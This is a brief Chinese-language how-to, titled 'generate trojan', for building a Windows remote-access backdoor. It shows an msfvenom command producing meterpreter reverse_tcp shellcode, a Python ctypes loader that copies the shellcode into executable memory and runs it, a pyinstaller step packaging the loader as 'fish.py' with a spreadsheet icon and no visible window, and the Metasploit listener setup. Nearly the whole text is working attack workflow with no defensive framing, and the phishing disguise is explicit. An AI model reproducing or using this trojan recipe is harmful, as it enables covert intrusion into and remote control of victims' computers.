生成木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.2.98 LPORT=2333 -f py
import ctypes
import sys
from ctypes import *

# 192.168.151.171 2333
buf =  b""
buf += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51"
....

PAGE_EXECUTE_READWRITE = 0x00000040  # 参数设定
VIRTUAL_MEM = (0x1000 | 0x2000)  # 参数设定
buf_arr = bytearray(buf)  # shellcode变为一个新的字节数组
buf_size = len(buf_arr)  # 计算shellcode的大小
kernel32 = ctypes.cdll.LoadLibrary("kernel32.dll")  # 调用kernel32.d11
kernel32.VirtualAlloc.restype = ctypes.c_uint64  # 返回类型为c_uint64sc
sc_ptr = kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(buf_size), VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)
buf_ptr = (ctypes.c_char * buf_size).from_buffer(buf_arr)  # 将shellcode指向指针
# print(sc_ptm)
# #print(buf_ptr)
kernel32.RtlMoveMemory(ctypes.c_uint64(sc_ptr), buf_ptr, ctypes.c_int(buf_size))  # 调用dll,指向shellcode

handle = kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(sc_ptr), ctypes.c_int(0),
                               ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

打包

pyinstaller -F fish.py --icon="xlsx.ico" -w

-w 程序运行不显示窗口

–icon是图标

msf开启监听

msfconsole -q
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.0.122   
set lport 2333
run